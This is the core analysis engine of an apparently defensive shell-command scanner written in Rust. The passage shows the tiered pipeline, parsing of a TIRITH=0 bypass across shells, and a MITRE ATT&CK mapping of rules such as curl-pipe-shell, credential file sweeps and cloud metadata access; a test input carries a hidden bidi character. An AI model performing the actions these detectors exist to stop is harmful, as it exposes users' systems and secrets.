tirith_core/
engine.rs

1use std::time::Instant;
2
3use crate::extract::{self, ScanContext};
4use crate::normalize;
5use crate::policy::Policy;
6use crate::tokenize::ShellType;
7use crate::verdict::{Finding, Timings, Verdict};
8
9/// Extract the raw path from a URL string before any normalization.
10fn extract_raw_path_from_url(raw: &str) -> Option<String> {
11    if let Some(idx) = raw.find("://") {
12        let after = &raw[idx + 3..];
13        if let Some(slash_idx) = after.find('/') {
14            // Find end of path (before ? or #)
15            let path_start = &after[slash_idx..];
16            let end = path_start.find(['?', '#']).unwrap_or(path_start.len());
17            return Some(path_start[..end].to_string());
18        }
19    }
20    None
21}
22
23/// Analysis context passed through the pipeline.
24pub struct AnalysisContext {
25    pub input: String,
26    pub shell: ShellType,
27    pub scan_context: ScanContext,
28    pub raw_bytes: Option<Vec<u8>>,
29    pub interactive: bool,
30    pub cwd: Option<String>,
31    /// File path being scanned (only populated for ScanContext::FileScan).
32    pub file_path: Option<std::path::PathBuf>,
33    /// Only populated for ScanContext::FileScan. When None, configfile checks use
34    /// `file_path`'s parent as implicit repo root.
35    pub repo_root: Option<String>,
36    /// True when `file_path` was explicitly provided by the user as a config file.
37    pub is_config_override: bool,
38    /// Clipboard HTML content for rich-text paste analysis.
39    /// Only populated when `tirith paste --html <path>` is used.
40    pub clipboard_html: Option<String>,
41}
42
43/// Check if a VAR=VALUE word is `TIRITH=0`, stripping optional surrounding quotes
44/// from the value (handles `TIRITH='0'` and `TIRITH="0"`).
45fn is_tirith_zero_assignment(word: &str) -> bool {
46    if let Some((name, raw_val)) = word.split_once('=') {
47        let val = raw_val.trim_matches(|c: char| c == '\'' || c == '"');
48        if name == "TIRITH" && val == "0" {
49            return true;
50        }
51    }
52    false
53}
54
55/// Check if the input contains an inline `TIRITH=0` bypass prefix.
56/// Handles POSIX bare prefix (`TIRITH=0 cmd`), env wrappers (`env -i TIRITH=0 cmd`),
57/// and PowerShell env syntax (`$env:TIRITH="0"; cmd`).
58fn find_inline_bypass(input: &str, shell: ShellType) -> bool {
59    use crate::tokenize;
60
61    if matches!(shell, ShellType::Posix | ShellType::Fish) {
62        let segments = tokenize::tokenize(input, shell);
63        if segments.len() != 1 || has_unquoted_ampersand(input, shell) {
64            return false;
65        }
66    }
67
68    let words = split_raw_words(input, shell);
69    if words.is_empty() {
70        return false;
71    }
72
73    // POSIX / Fish: VAR=VALUE prefix or env wrapper
74    // (Fish 3.1+ and all POSIX shells support `TIRITH=0 command`)
75
76    // Case 1: Leading VAR=VALUE assignments before the command
77    let mut idx = 0;
78    while idx < words.len() && tokenize::is_env_assignment(&words[idx]) {
79        if is_tirith_zero_assignment(&words[idx]) {
80            return true;
81        }
82        idx += 1;
83    }
84
85    // Case 2: First real word is `env` — parse env-style args
86    if idx < words.len() {
87        let cmd = words[idx].rsplit('/').next().unwrap_or(&words[idx]);
88        let cmd = cmd.trim_matches(|c: char| c == '\'' || c == '"');
89        if cmd == "env" {
90            idx += 1;
91            while idx < words.len() {
92                let w = &words[idx];
93                if w == "--" {
94                    idx += 1;
95                    // After --, remaining are VAR=VALUE or command
96                    break;
97                }
98                if tokenize::is_env_assignment(w) {
99                    if is_tirith_zero_assignment(w) {
100                        return true;
101                    }
102                    idx += 1;
103                    continue;
104                }
105                if w.starts_with('-') {
106                    if w.starts_with("--") {
107                        if env_long_flag_takes_value(w) && !w.contains('=') {
108                            idx += 2;
109                        } else {
110                            idx += 1;
111                        }
112                        continue;
113                    }
114                    // Short flags that take a separate value arg
115                    if w == "-u" || w == "-C" || w == "-S" {
116                        idx += 2;
117                        continue;
118                    }
119                    idx += 1;
120                    continue;
121                }
122                // Non-flag, non-assignment = the command, stop
123                break;
124            }
125            // Check remaining words after -- for TIRITH=0
126            while idx < words.len() && tokenize::is_env_assignment(&words[idx]) {
127                if is_tirith_zero_assignment(&words[idx]) {
128                    return true;
129                }
130                idx += 1;
131            }
132        }
133    }
134
135    // PowerShell: $env:TIRITH="0" or $env:TIRITH = "0" (before first ;)
136    if shell == ShellType::PowerShell {
137        for word in &words {
138            if is_powershell_tirith_bypass(word) {
139                return true;
140            }
141        }
142        // Multi-word: $env:TIRITH = "0" (space around =)
143        if words.len() >= 3 {
144            for window in words.windows(3) {
145                if is_powershell_env_ref(&window[0], "TIRITH")
146                    && window[1] == "="
147                    && strip_surrounding_quotes(&window[2]) == "0"
148                {
149                    return true;
150                }
151            }
152        }
153    }
154
155    // Cmd: "set TIRITH=0 & ..." or 'set "TIRITH=0" & ...'
156    // In cmd.exe, `set TIRITH="0"` stores the literal `"0"` (with quotes) as the
157    // value, so we must NOT strip inner quotes from the value. Only bare `TIRITH=0`
158    // and whole-token-quoted `"TIRITH=0"` are real bypasses.
159    if shell == ShellType::Cmd && words.len() >= 2 {
160        let first = words[0].to_lowercase();
161        if first == "set" {
162            let second = strip_double_quotes_only(&words[1]);
163            if let Some((name, val)) = second.split_once('=') {
164                if name == "TIRITH" && val == "0" {
165                    return true;
166                }
167            }
168        }
169    }
170
171    false
172}
173
174fn env_long_flag_takes_value(flag: &str) -> bool {
175    let name = flag.split_once('=').map(|(name, _)| name).unwrap_or(flag);
176    matches!(name, "--unset" | "--chdir" | "--split-string")
177}
178
179/// Check if a word is `$env:TIRITH=0` with optional quotes around the value.
180/// The `$env:` prefix is matched case-insensitively (PowerShell convention).
181fn is_powershell_tirith_bypass(word: &str) -> bool {
182    if !word.starts_with('$') || word.len() < "$env:TIRITH=0".len() {
183        return false;
184    }
185    let after_dollar = &word[1..];
186    if !after_dollar
187        .get(..4)
188        .is_some_and(|s| s.eq_ignore_ascii_case("env:"))
189    {
190        return false;
191    }
192    let after_env = &after_dollar[4..];
193    if !after_env
194        .get(..7)
195        .is_some_and(|s| s.eq_ignore_ascii_case("TIRITH="))
196    {
197        return false;
198    }
199    let value = &after_env[7..];
200    strip_surrounding_quotes(value) == "0"
201}
202
203/// Check if a word is a PowerShell env var reference `$env:VARNAME` (no assignment).
204fn is_powershell_env_ref(word: &str, var_name: &str) -> bool {
205    if !word.starts_with('$') {
206        return false;
207    }
208    let after_dollar = &word[1..];
209    if !after_dollar
210        .get(..4)
211        .is_some_and(|s| s.eq_ignore_ascii_case("env:"))
212    {
213        return false;
214    }
215    after_dollar[4..].eq_ignore_ascii_case(var_name)
216}
217
218/// Strip a single layer of matching quotes (single or double) from a string.
219fn strip_surrounding_quotes(s: &str) -> &str {
220    if s.len() >= 2
221        && ((s.starts_with('"') && s.ends_with('"')) || (s.starts_with('\'') && s.ends_with('\'')))
222    {
223        &s[1..s.len() - 1]
224    } else {
225        s
226    }
227}
228
229/// Strip a single layer of matching double quotes only. For Cmd, single quotes are literal.
230fn strip_double_quotes_only(s: &str) -> &str {
231    if s.len() >= 2 && s.starts_with('"') && s.ends_with('"') {
232        &s[1..s.len() - 1]
233    } else {
234        s
235    }
236}
237
238/// Split input into raw words respecting quotes (for bypass/self-invocation parsing).
239/// Unlike tokenize(), this doesn't split on pipes/semicolons — just whitespace-splits
240/// the raw input to inspect the first segment's words.
241///
242/// Shell-aware: POSIX uses backslash as escape inside double-quotes and bare context;
243/// PowerShell uses backtick (`` ` ``) instead.
244fn split_raw_words(input: &str, shell: ShellType) -> Vec<String> {
245    let escape_char = match shell {
246        ShellType::PowerShell => '`',
247        ShellType::Cmd => '^',
248        _ => '\\',
249    };
250
251    // Take only up to the first unquoted pipe/semicolon/&&/||
252    let mut words = Vec::new();
253    let mut current = String::new();
254    let chars: Vec<char> = input.chars().collect();
255    let len = chars.len();
256    let mut i = 0;
257
258    while i < len {
259        let ch = chars[i];
260        match ch {
261            ' ' | '\t' if !current.is_empty() => {
262                words.push(current.clone());
263                current.clear();
264                i += 1;
265                while i < len && (chars[i] == ' ' || chars[i] == '\t') {
266                    i += 1;
267                }
268            }
269            ' ' | '\t' => {
270                i += 1;
271            }
272            '|' | '\n' | '&' => break, // Stop at segment boundary
273            ';' if shell != ShellType::Cmd => break,
274            '#' if shell == ShellType::PowerShell => break,
275            '\'' if shell != ShellType::Cmd => {
276                current.push(ch);
277                i += 1;
278                while i < len && chars[i] != '\'' {
279                    current.push(chars[i]);
280                    i += 1;
281                }
282                if i < len {
283                    current.push(chars[i]);
284                    i += 1;
285                }
286            }
287            '"' => {
288                current.push(ch);
289                i += 1;
290                while i < len && chars[i] != '"' {
291                    if chars[i] == escape_char && i + 1 < len {
292                        current.push(chars[i]);
293                        current.push(chars[i + 1]);
294                        i += 2;
295                    } else {
296                        current.push(chars[i]);
297                        i += 1;
298                    }
299                }
300                if i < len {
301                    current.push(chars[i]);
302                    i += 1;
303                }
304            }
305            c if c == escape_char && i + 1 < len => {
306                current.push(chars[i]);
307                current.push(chars[i + 1]);
308                i += 2;
309            }
310            _ => {
311                current.push(ch);
312                i += 1;
313            }
314        }
315    }
316    if !current.is_empty() {
317        words.push(current);
318    }
319    words
320}
321
322/// Check if input contains an unquoted `&` (backgrounding operator).
323fn has_unquoted_ampersand(input: &str, shell: ShellType) -> bool {
324    let escape_char = match shell {
325        ShellType::PowerShell => '`',
326        ShellType::Cmd => '^',
327        _ => '\\',
328    };
329    let chars: Vec<char> = input.chars().collect();
330    let len = chars.len();
331    let mut i = 0;
332    while i < len {
333        match chars[i] {
334            '\'' if shell != ShellType::Cmd => {
335                i += 1;
336                while i < len && chars[i] != '\'' {
337                    i += 1;
338                }
339                if i < len {
340                    i += 1;
341                }
342            }
343            '"' => {
344                i += 1;
345                while i < len && chars[i] != '"' {
346                    if chars[i] == escape_char && i + 1 < len {
347                        i += 2;
348                    } else {
349                        i += 1;
350                    }
351                }
352                if i < len {
353                    i += 1;
354                }
355            }
356            c if c == escape_char && i + 1 < len => {
357                i += 2; // skip escaped char
358            }
359            '&' => return true,
360            _ => i += 1,
361        }
362    }
363    false
364}
365
366/// Run the tiered analysis pipeline.
367pub fn analyze(ctx: &AnalysisContext) -> Verdict {
368    let start = Instant::now();
369
370    // Tier 0: Check bypass flag
371    let tier0_start = Instant::now();
372    let bypass_env = std::env::var("TIRITH").ok().as_deref() == Some("0");
373    let bypass_inline = find_inline_bypass(&ctx.input, ctx.shell);
374    let bypass_requested = bypass_env || bypass_inline;
375    let tier0_ms = tier0_start.elapsed().as_secs_f64() * 1000.0;
376
377    // Tier 1: Fast scan (no I/O)
378    let tier1_start = Instant::now();
379
380    // Step 1 (paste only): byte-level scan for control chars
381    let byte_scan_triggered = if ctx.scan_context == ScanContext::Paste {
382        if let Some(ref bytes) = ctx.raw_bytes {
383            let scan = extract::scan_bytes(bytes);
384            scan.has_ansi_escapes
385                || scan.has_control_chars
386                || scan.has_bidi_controls
387                || scan.has_zero_width
388                || scan.has_invalid_utf8
389                || scan.has_unicode_tags
390                || scan.has_variation_selectors
391                || scan.has_invisible_math_operators
392                || scan.has_invisible_whitespace
393        } else {
394            false
395        }
396    } else {
397        false
398    };
399
400    // Step 2: URL-like regex scan
401    let regex_triggered = extract::tier1_scan(&ctx.input, ctx.scan_context);
402
403    // Step 3 (exec only): check for bidi/zero-width/invisible chars even without URLs
404    let exec_bidi_triggered = if ctx.scan_context == ScanContext::Exec {
405        let scan = extract::scan_bytes(ctx.input.as_bytes());
406        scan.has_bidi_controls
407            || scan.has_zero_width
408            || scan.has_unicode_tags
409            || scan.has_variation_selectors
410            || scan.has_invisible_math_operators
411            || scan.has_invisible_whitespace
412    } else {
413        false
414    };
415
416    let tier1_ms = tier1_start.elapsed().as_secs_f64() * 1000.0;
417
418    // If nothing triggered, fast exit
419    if !byte_scan_triggered && !regex_triggered && !exec_bidi_triggered {
420        let total_ms = start.elapsed().as_secs_f64() * 1000.0;
421        return Verdict::allow_fast(
422            1,
423            Timings {
424                tier0_ms,
425                tier1_ms,
426                tier2_ms: None,
427                tier3_ms: None,
428                total_ms,
429            },
430        );
431    }
432
433    // Tier 2: Policy + data loading (deferred I/O)
434    let tier2_start = Instant::now();
435
436    if bypass_requested {
437        // Load partial policy to check bypass settings
438        let policy = Policy::discover_partial(ctx.cwd.as_deref());
439        let allow_bypass = if ctx.interactive {
440            policy.allow_bypass_env
441        } else {
442            policy.allow_bypass_env_noninteractive
443        };
444
445        if allow_bypass {
446            let tier2_ms = tier2_start.elapsed().as_secs_f64() * 1000.0;
447            let total_ms = start.elapsed().as_secs_f64() * 1000.0;
448            let mut verdict = Verdict::allow_fast(
449                2,
450                Timings {
451                    tier0_ms,
452                    tier1_ms,
453                    tier2_ms: Some(tier2_ms),
454                    tier3_ms: None,
455                    total_ms,
456                },
457            );
458            verdict.bypass_requested = true;
459            verdict.bypass_honored = true;
460            verdict.interactive_detected = ctx.interactive;
461            verdict.policy_path_used = policy.path.clone();
462            // Log bypass to audit (include custom DLP patterns from partial policy)
463            crate::audit::log_verdict(
464                &verdict,
465                &ctx.input,
466                None,
467                None,
468                &policy.dlp_custom_patterns,
469            );
470            return verdict;
471        }
472    }
473
474    let mut policy = Policy::discover(ctx.cwd.as_deref());
475    policy.load_user_lists();
476    policy.load_org_lists(ctx.cwd.as_deref());
477    let tier2_ms = tier2_start.elapsed().as_secs_f64() * 1000.0;
478
479    // Tier 3: Full analysis
480    let tier3_start = Instant::now();
481    let mut findings = Vec::new();
482
483    // Track extracted URLs for allowlist/blocklist (Exec/Paste only)
484    let mut extracted = Vec::new();
485
486    if ctx.scan_context == ScanContext::FileScan {
487        // FileScan: byte scan + configfile rules ONLY.
488        // Does NOT run command/env/URL-extraction rules.
489        let byte_input = if let Some(ref bytes) = ctx.raw_bytes {
490            bytes.as_slice()
491        } else {
492            ctx.input.as_bytes()
493        };
494        let byte_findings = crate::rules::terminal::check_bytes(byte_input);
495        findings.extend(byte_findings);
496
497        // Config file detection rules
498        findings.extend(crate::rules::configfile::check(
499            &ctx.input,
500            ctx.file_path.as_deref(),
501            ctx.repo_root.as_deref().map(std::path::Path::new),
502            ctx.is_config_override,
503        ));
504
505        // Rendered content rules (file-type gated)
506        if crate::rules::rendered::is_renderable_file(ctx.file_path.as_deref()) {
507            // PDF files get their own parser
508            let is_pdf = ctx
509                .file_path
510                .as_deref()
511                .and_then(|p| p.extension())
512                .and_then(|e| e.to_str())
513                .map(|e| e.eq_ignore_ascii_case("pdf"))
514                .unwrap_or(false);
515
516            if is_pdf {
517                let pdf_bytes = ctx.raw_bytes.as_deref().unwrap_or(ctx.input.as_bytes());
518                findings.extend(crate::rules::rendered::check_pdf(pdf_bytes));
519            } else {
520                findings.extend(crate::rules::rendered::check(
521                    &ctx.input,
522                    ctx.file_path.as_deref(),
523                ));
524            }
525        }
526    } else {
527        // Exec/Paste: standard pipeline
528
529        // Run byte-level rules for paste context
530        if ctx.scan_context == ScanContext::Paste {
531            if let Some(ref bytes) = ctx.raw_bytes {
532                let byte_findings = crate::rules::terminal::check_bytes(bytes);
533                findings.extend(byte_findings);
534            }
535            // Check for hidden multiline content in pasted text
536            let multiline_findings = crate::rules::terminal::check_hidden_multiline(&ctx.input);
537            findings.extend(multiline_findings);
538
539            // Check clipboard HTML for hidden content (rich-text paste analysis)
540            if let Some(ref html) = ctx.clipboard_html {
541                let clipboard_findings =
542                    crate::rules::terminal::check_clipboard_html(html, &ctx.input);
543                findings.extend(clipboard_findings);
544            }
545        }
546
547        // Invisible character checks apply to both exec and paste contexts
548        if ctx.scan_context == ScanContext::Exec {
549            let byte_input = ctx.input.as_bytes();
550            let scan = extract::scan_bytes(byte_input);
551            if scan.has_bidi_controls
552                || scan.has_zero_width
553                || scan.has_unicode_tags
554                || scan.has_variation_selectors
555                || scan.has_invisible_math_operators
556                || scan.has_invisible_whitespace
557            {
558                let byte_findings = crate::rules::terminal::check_bytes(byte_input);
559                // Only keep invisible-char findings for exec context
560                findings.extend(byte_findings.into_iter().filter(|f| {
561                    matches!(
562                        f.rule_id,
563                        crate::verdict::RuleId::BidiControls
564                            | crate::verdict::RuleId::ZeroWidthChars
565                            | crate::verdict::RuleId::UnicodeTags
566                            | crate::verdict::RuleId::InvisibleMathOperator
567                            | crate::verdict::RuleId::VariationSelector
568                            | crate::verdict::RuleId::InvisibleWhitespace
569                    )
570                }));
571            }
572        }
573
574        // Extract and analyze URLs
575        extracted = extract::extract_urls(&ctx.input, ctx.shell);
576
577        for url_info in &extracted {
578            // Normalize path if available — use raw extracted URL's path for non-ASCII detection
579            // since url::Url percent-encodes non-ASCII during parsing
580            let raw_path = extract_raw_path_from_url(&url_info.raw);
581            let normalized_path = url_info.parsed.path().map(normalize::normalize_path);
582
583            // Run all rule categories
584            let hostname_findings = crate::rules::hostname::check(&url_info.parsed, &policy);
585            findings.extend(hostname_findings);
586
587            let path_findings = crate::rules::path::check(
588                &url_info.parsed,
589                normalized_path.as_ref(),
590                raw_path.as_deref(),
591            );
592            findings.extend(path_findings);
593
594            let transport_findings =
595                crate::rules::transport::check(&url_info.parsed, url_info.in_sink_context);
596            findings.extend(transport_findings);
597
598            let ecosystem_findings = crate::rules::ecosystem::check(&url_info.parsed);
599            findings.extend(ecosystem_findings);
600        }
601
602        // Run command-shape rules on full input
603        let command_findings = crate::rules::command::check(
604            &ctx.input,
605            ctx.shell,
606            ctx.cwd.as_deref(),
607            ctx.scan_context,
608        );
609        findings.extend(command_findings);
610
611        // Run credential leak detection rules
612        let cred_findings =
613            crate::rules::credential::check(&ctx.input, ctx.shell, ctx.scan_context);
614        findings.extend(cred_findings);
615
616        // Run environment rules
617        let env_findings = crate::rules::environment::check(&crate::rules::environment::RealEnv);
618        findings.extend(env_findings);
619
620        // Policy-driven network deny/allow (Team feature)
621        if crate::license::current_tier() >= crate::license::Tier::Team
622            && !policy.network_deny.is_empty()
623        {
624            let net_findings = crate::rules::command::check_network_policy(
625                &ctx.input,
626                ctx.shell,
627                &policy.network_deny,
628                &policy.network_allow,
629            );
630            findings.extend(net_findings);
631        }
632    }
633
634    // Custom YAML detection rules (Team-only, Phase 24)
635    if crate::license::current_tier() >= crate::license::Tier::Team
636        && !policy.custom_rules.is_empty()
637    {
638        let compiled = crate::rules::custom::compile_rules(&policy.custom_rules);
639        let custom_findings = crate::rules::custom::check(&ctx.input, ctx.scan_context, &compiled);
640        findings.extend(custom_findings);
641    }
642
643    // Apply policy severity overrides
644    for finding in &mut findings {
645        if let Some(override_sev) = policy.severity_override(&finding.rule_id) {
646            finding.severity = override_sev;
647        }
648    }
649
650    // Filter by allowlist/blocklist
651    // Blocklist: if any extracted URL matches blocklist, escalate to Block
652    for url_info in &extracted {
653        if policy.is_blocklisted(&url_info.raw) {
654            findings.push(Finding {
655                rule_id: crate::verdict::RuleId::PolicyBlocklisted,
656                severity: crate::verdict::Severity::Critical,
657                title: "URL matches blocklist".to_string(),
658                description: format!("URL '{}' matches a blocklist pattern", url_info.raw),
659                evidence: vec![crate::verdict::Evidence::Url {
660                    raw: url_info.raw.clone(),
661                }],
662                human_view: None,
663                agent_view: None,
664                mitre_id: None,
665                custom_rule_id: None,
666            });
667        }
668    }
669
670    // Allowlist: remove findings for URLs that match allowlist
671    // (blocklist takes precedence — if blocklisted, findings remain)
672    if !policy.allowlist.is_empty() || !policy.allowlist_rules.is_empty() {
673        let blocklisted_urls: Vec<&str> = extracted
674            .iter()
675            .filter(|u| policy.is_blocklisted(&u.raw))
676            .map(|u| u.raw.as_str())
677            .collect();
678
679        findings.retain(|f| {
680            let urls_in_evidence: Vec<&str> = f
681                .evidence
682                .iter()
683                .filter_map(|e| match e {
684                    crate::verdict::Evidence::Url { raw } => Some(raw.as_str()),
685                    _ => None,
686                })
687                .collect();
688
689            if urls_in_evidence.is_empty() {
690                return true;
691            }
692
693            let rule_allowlisted = |url: &str| {
694                policy.is_allowlisted_for_rule(&f.rule_id.to_string(), url)
695                    || f.custom_rule_id.as_deref().is_some_and(|custom_rule_id| {
696                        policy.is_allowlisted_for_rule(custom_rule_id, url)
697                    })
698            };
699
700            // Keep if any referenced URL is blocklisted. Otherwise only drop the
701            // finding when every referenced URL is allowlisted for this finding.
702            urls_in_evidence
703                .iter()
704                .any(|url| blocklisted_urls.contains(url))
705                || !urls_in_evidence
706                    .iter()
707                    .all(|url| policy.is_allowlisted(url) || rule_allowlisted(url))
708        });
709    }
710
711    // Enrichment pass (ADR-13): detection is free, enrichment is paid.
712    // All detection rules have already run above. Now add tier-gated enrichment.
713    let tier = crate::license::current_tier();
714    if tier >= crate::license::Tier::Pro {
715        enrich_pro(&mut findings);
716    }
717    if tier >= crate::license::Tier::Team {
718        enrich_team(&mut findings);
719    }
720
721    // Early access filter (ADR-14): suppress non-critical findings for rules
722    // in time-boxed early access windows when tier is below the minimum.
723    crate::rule_metadata::filter_early_access(&mut findings, tier);
724
725    let tier3_ms = tier3_start.elapsed().as_secs_f64() * 1000.0;
726    let total_ms = start.elapsed().as_secs_f64() * 1000.0;
727
728    let mut verdict = Verdict::from_findings(
729        findings,
730        3,
731        Timings {
732            tier0_ms,
733            tier1_ms,
734            tier2_ms: Some(tier2_ms),
735            tier3_ms: Some(tier3_ms),
736            total_ms,
737        },
738    );
739    verdict.bypass_requested = bypass_requested;
740    verdict.interactive_detected = ctx.interactive;
741    verdict.policy_path_used = policy.path.clone();
742    verdict.urls_extracted_count = Some(extracted.len());
743
744    verdict
745}
746
747// ---------------------------------------------------------------------------
748// Paranoia tier filtering (Phase 15)
749// ---------------------------------------------------------------------------
750
751/// Filter a verdict's findings by paranoia level and license tier.
752///
753/// This is an output-layer filter — the engine always detects everything (ADR-13).
754/// CLI/MCP call this after `analyze()` to reduce noise at lower paranoia levels.
755///
756/// - Paranoia 1-2 (any tier): Medium+ findings only
757/// - Paranoia 3 (Pro required): also show Low findings
758/// - Paranoia 4 (Pro required): also show Info findings
759///
760/// Free-tier users are capped at effective paranoia 2 regardless of policy setting.
761pub fn filter_findings_by_paranoia(verdict: &mut Verdict, paranoia: u8) {
762    retain_by_paranoia(&mut verdict.findings, paranoia);
763    verdict.action = recalculate_action(&verdict.findings);
764}
765
766/// Filter a Vec<Finding> by paranoia level and license tier.
767/// Same logic as `filter_findings_by_paranoia` but operates on raw findings
768/// (for scan results that don't use the Verdict wrapper).
769pub fn filter_findings_by_paranoia_vec(findings: &mut Vec<Finding>, paranoia: u8) {
770    retain_by_paranoia(findings, paranoia);
771}
772
773/// Recalculate verdict action from the current findings (same logic as `Verdict::from_findings`).
774fn recalculate_action(findings: &[Finding]) -> crate::verdict::Action {
775    use crate::verdict::{Action, Severity};
776    if findings.is_empty() {
777        return Action::Allow;
778    }
779    let max_severity = findings
780        .iter()
781        .map(|f| f.severity)
782        .max()
783        .unwrap_or(Severity::Low);
784    match max_severity {
785        Severity::Critical | Severity::High => Action::Block,
786        Severity::Medium | Severity::Low => Action::Warn,
787        Severity::Info => Action::Allow,
788    }
789}
790
791/// Shared paranoia retention logic.
792fn retain_by_paranoia(findings: &mut Vec<Finding>, paranoia: u8) {
793    let tier = crate::license::current_tier();
794    let effective = if tier >= crate::license::Tier::Pro {
795        paranoia.min(4)
796    } else {
797        paranoia.min(2) // Free users capped at 2
798    };
799
800    findings.retain(|f| match f.severity {
801        crate::verdict::Severity::Info => effective >= 4,
802        crate::verdict::Severity::Low => effective >= 3,
803        _ => true, // Medium/High/Critical always shown
804    });
805}
806
807// ---------------------------------------------------------------------------
808// Tier-gated enrichment (ADR-13: detect free, enrich paid)
809// ---------------------------------------------------------------------------
810
811/// Pro enrichment: dual-view, decoded content, cloaking diffs, line numbers.
812fn enrich_pro(findings: &mut [Finding]) {
813    for finding in findings.iter_mut() {
814        match finding.rule_id {
815            // Rendered content findings: show what human sees vs what agent processes
816            crate::verdict::RuleId::HiddenCssContent => {
817                finding.human_view =
818                    Some("Content hidden via CSS — invisible in rendered view".into());
819                finding.agent_view = Some(format!(
820                    "AI agent sees full text including CSS-hidden content. {}",
821                    evidence_summary(&finding.evidence)
822                ));
823            }
824            crate::verdict::RuleId::HiddenColorContent => {
825                finding.human_view =
826                    Some("Text blends with background — invisible to human eye".into());
827                finding.agent_view = Some(format!(
828                    "AI agent reads text regardless of color contrast. {}",
829                    evidence_summary(&finding.evidence)
830                ));
831            }
832            crate::verdict::RuleId::HiddenHtmlAttribute => {
833                finding.human_view =
834                    Some("Elements marked hidden/aria-hidden — not displayed".into());
835                finding.agent_view = Some(format!(
836                    "AI agent processes hidden element content. {}",
837                    evidence_summary(&finding.evidence)
838                ));
839            }
840            crate::verdict::RuleId::HtmlComment => {
841                finding.human_view = Some("HTML comments not rendered in browser".into());
842                finding.agent_view = Some(format!(
843                    "AI agent reads comment content as context. {}",
844                    evidence_summary(&finding.evidence)
845                ));
846            }
847            crate::verdict::RuleId::MarkdownComment => {
848                finding.human_view = Some("Markdown comments not rendered in preview".into());
849                finding.agent_view = Some(format!(
850                    "AI agent processes markdown comment content. {}",
851                    evidence_summary(&finding.evidence)
852                ));
853            }
854            crate::verdict::RuleId::PdfHiddenText => {
855                finding.human_view = Some("Sub-pixel text invisible in PDF viewer".into());
856                finding.agent_view = Some(format!(
857                    "AI agent extracts all text including sub-pixel content. {}",
858                    evidence_summary(&finding.evidence)
859                ));
860            }
861            crate::verdict::RuleId::ClipboardHidden => {
862                finding.human_view =
863                    Some("Hidden content in clipboard HTML not visible in paste preview".into());
864                finding.agent_view = Some(format!(
865                    "AI agent processes full clipboard including hidden HTML. {}",
866                    evidence_summary(&finding.evidence)
867                ));
868            }
869            _ => {}
870        }
871    }
872}
873
874/// Summarize evidence entries for enrichment text.
875fn evidence_summary(evidence: &[crate::verdict::Evidence]) -> String {
876    let details: Vec<&str> = evidence
877        .iter()
878        .filter_map(|e| {
879            if let crate::verdict::Evidence::Text { detail } = e {
880                Some(detail.as_str())
881            } else {
882                None
883            }
884        })
885        .take(3)
886        .collect();
887    if details.is_empty() {
888        String::new()
889    } else {
890        format!("Details: {}", details.join("; "))
891    }
892}
893
894/// MITRE ATT&CK technique mapping for built-in rules.
895fn mitre_id_for_rule(rule_id: crate::verdict::RuleId) -> Option<&'static str> {
896    use crate::verdict::RuleId;
897    match rule_id {
898        // Execution
899        RuleId::PipeToInterpreter
900        | RuleId::CurlPipeShell
901        | RuleId::WgetPipeShell
902        | RuleId::HttpiePipeShell
903        | RuleId::XhPipeShell => Some("T1059.004"), // Command and Scripting Interpreter: Unix Shell
904
905        // Persistence
906        RuleId::DotfileOverwrite => Some("T1546.004"), // Event Triggered Execution: Unix Shell Config
907
908        // Defense Evasion
909        RuleId::BidiControls
910        | RuleId::UnicodeTags
911        | RuleId::ZeroWidthChars
912        | RuleId::InvisibleMathOperator
913        | RuleId::VariationSelector
914        | RuleId::InvisibleWhitespace => {
915            Some("T1036.005") // Masquerading: Match Legitimate Name or Location
916        }
917        RuleId::HiddenMultiline | RuleId::AnsiEscapes | RuleId::ControlChars => Some("T1036.005"),
918
919        // Hijack Execution Flow
920        RuleId::CodeInjectionEnv => Some("T1574.006"), // Hijack Execution Flow: Dynamic Linker Hijacking
921        RuleId::InterpreterHijackEnv => Some("T1574.007"), // Path Interception by PATH
922        RuleId::ShellInjectionEnv => Some("T1546.004"), // Shell Config Modification
923
924        // Credential Access
925        RuleId::CredentialInText | RuleId::HighEntropySecret => Some("T1552"), // Unsecured Credentials
926        RuleId::PrivateKeyExposed => Some("T1552.004"),                        // Private Keys
927        RuleId::MetadataEndpoint => Some("T1552.005"), // Unsecured Credentials: Cloud Instance Metadata
928        RuleId::SensitiveEnvExport | RuleId::CredentialFileSweep => Some("T1552.001"), // Credentials In Files
929        RuleId::ProcMemAccess => Some("T1003.007"), // OS Credential Dumping: Proc Filesystem
930        RuleId::DockerRemotePrivEsc => Some("T1611"), // Escape to Host
931
932        // Supply Chain
933        RuleId::ConfigInjection => Some("T1195.001"), // Supply Chain Compromise: Dev Tools
934        RuleId::McpInsecureServer | RuleId::McpSuspiciousArgs => Some("T1195.002"), // Compromise Software Supply Chain
935        RuleId::GitTyposquat => Some("T1195.001"),
936        RuleId::DockerUntrustedRegistry => Some("T1195.002"),
937
938        // Discovery / Lateral Movement
939        RuleId::PrivateNetworkAccess => Some("T1046"), // Network Service Discovery
940        RuleId::ServerCloaking => Some("T1036"),       // Masquerading
941
942        // Collection
943        RuleId::ArchiveExtract => Some("T1560.001"), // Archive Collected Data: Archive via Utility
944
945        // Exfiltration
946        RuleId::ProxyEnvSet => Some("T1090.001"), // Proxy: Internal Proxy
947
948        _ => None,
949    }
950}
951
952/// Team enrichment: MITRE ATT&CK classification.
953fn enrich_team(findings: &mut [Finding]) {
954    for finding in findings.iter_mut() {
955        if finding.mitre_id.is_none() {
956            finding.mitre_id = mitre_id_for_rule(finding.rule_id).map(String::from);
957        }
958    }
959}
960
961#[cfg(test)]
962mod tests {
963    use super::*;
964    #[test]
965    fn test_exec_bidi_without_url() {
966        // Input with bidi control but no URL — should NOT fast-exit at tier 1
967        let input = format!("echo hello{}world", '\u{202E}');
968        let ctx = AnalysisContext {
969            input,
970            shell: ShellType::Posix,
971            scan_context: ScanContext::Exec,
972            raw_bytes: None,
973            interactive: true,
974            cwd: None,
975            file_path: None,
976            repo_root: None,
977            is_config_override: false,
978            clipboard_html: None,
979        };
980        let verdict = analyze(&ctx);
981        // Should reach tier 3 (not fast-exit at tier 1)
982        assert!(
983            verdict.tier_reached >= 3,
984            "bidi in exec should reach tier 3, got tier {}",
985            verdict.tier_reached
986        );
987        // Should have findings about bidi
988        assert!(
989            verdict
990                .findings
991                .iter()
992                .any(|f| matches!(f.rule_id, crate::verdict::RuleId::BidiControls)),
993            "should detect bidi controls in exec context"
994        );
995    }
996
997    #[test]
998    fn test_paranoia_filter_suppresses_info_low() {
999        use crate::verdict::{Finding, RuleId, Severity, Timings, Verdict};
1000
1001        let findings = vec![
1002            Finding {
1003                rule_id: RuleId::VariationSelector,
1004                severity: Severity::Info,
1005                title: "info finding".into(),
